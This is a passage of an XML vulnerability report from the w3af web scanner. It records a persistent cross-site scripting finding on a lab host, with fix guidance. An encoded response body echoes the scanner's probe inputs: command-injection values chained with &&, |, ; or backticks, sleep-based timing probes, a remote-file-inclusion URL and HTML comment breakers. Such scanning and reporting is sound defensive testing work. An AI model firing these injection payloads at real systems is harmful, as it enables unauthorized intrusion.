cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD48IS0tPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjwhLS08L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+aWFmNDkvKjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41MGlnaTwvLT48L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+ZGxuYmciZGxuYmc8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NnFpY2FgNnFp
Y2E8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+Z2V3bTYgPTwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5zbGVlcCgzKTs8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+IjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5pRG9udEV4aXN0PC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiI8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+aURvbnRFeGlzdDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+PC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPnczYWYNCnZ1bG5lcmFibGUwNzNiOiBhZTU8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
dzNhZg0KdnVsbmVyYWJsZTA3M2I6IGFlNWN3M2FmPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnNsZWVwKDMpOzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD53M2FmDXZ1bG5lcmFibGUwNzNiOiBhZTVjPC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PnczYWYNdnVsbmVyYWJsZTA3M2I6IGFlNWN3M2FmPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPnczYWYKdnVsbmVyYWJsZTA3M2I6IGFlNWN3M2FmPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPnczYWYKdnVsbmVyYWJsZTA3M2I6IGFlNWM8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
aHR0cDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmh0dHA6Ly93M2FmLm9y
Zy9yZmkuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD53M2FmLm9yZy9yZmkuaHRt
bDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD53M2FmLm9yZy9yZmkuaHRtbDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5oVHRQOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+aFR0
UDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBp
bmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+MGhkaXI8Ly0+PC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPm9nN2IxLyo8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+ZXRkNW4iZXRkNW48L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+dnJwdGZgdnJwdGY8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+dHpmaDggPTwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBX
b3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4vdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGhvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlRo
cmVhZC5zbGVlcCgzMDAwKTs8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+VGhyZWFk
LnNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+VGhyZWFkLlNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD5UaHJlYWQuU2xlZXAoMzAwMCk7PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiYmcGluZyAtYyA0IGxvY2FsaG9z
dDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD4mJi91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1uIDQg
bG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPnxwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnwvdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGg8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+O3BpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
O3BpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Oy91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cGluZyAtYyA0IGxvY2FsaG9zdDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vdXNyL3NiaW4v
cGluZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JiZwaW5nIC1jIDQgbG9j
YWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPiYmL3Vzci9zYmluL3BpbmcgLXMgbG9jYWxob3N0IDQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2NhbGhv
c3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0PC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjtw
aW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGluZyAt
cyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhvc3Rg
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjwvcD4KICAgICAgICA8cD48L3A+CiAgICAgICAgPGhyIC8+Cg==
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[828, 1175]" method="POST" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" severity="High" url="http://10.12.68.43:31337/post" var="message">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;0hdir&lt;/-&gt;&quot; to the &quot;message&quot; parameter at http://10.12.68.43:31337/post, which is echoed when browsing to http://10.12.68.43:31337/.</description>
        <long-description>Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction. 

 Cross Site Scripting (XSS) allows clients to inject arbitrary scripting code into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or encoding. 

 Persistent Cross Site Scripting vulnerabilities occur when the application stores user controlled information and then uses it to render HTTP response bodies to other clients. 

 This type of vulnerability can be used by a cyber-criminal to perform session hijacking, phishing or denial of service attacks against other web application users.</long-description>
        <fix-guidance>To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page. 

 Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc. Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: 

 * `&amp;`
 * `&lt;`
 * `&gt;`
 * `&quot;`
 * `'`
 * `/`
 

 An example of HTML entity encoding is converting `&lt;` to `&amp;lt;`. Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed: 

 1. Directly in a script.
 2. Inside an HTML comment.
 3. In an attribute name.
 4. In a tag name.
 5. Directly in CSS.
 

 Each of these locations have their own form of escaping and filtering. 

 _Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions._</fix-guidance>
        <fix-effort>10</fix-effort>
        <references>
            <reference title="WASC" url="http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting"/>
            <reference title="Secunia" url="http://secunia.com/advisories/9716/"/>
            <reference title="ha.ckers" url="http://ha.ckers.org/xss.html"/>
            <reference title="OWASP" url="https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet"/>
        </references>
        <http-transactions>
            <http-transaction id="828">
                <http-request>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="33" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
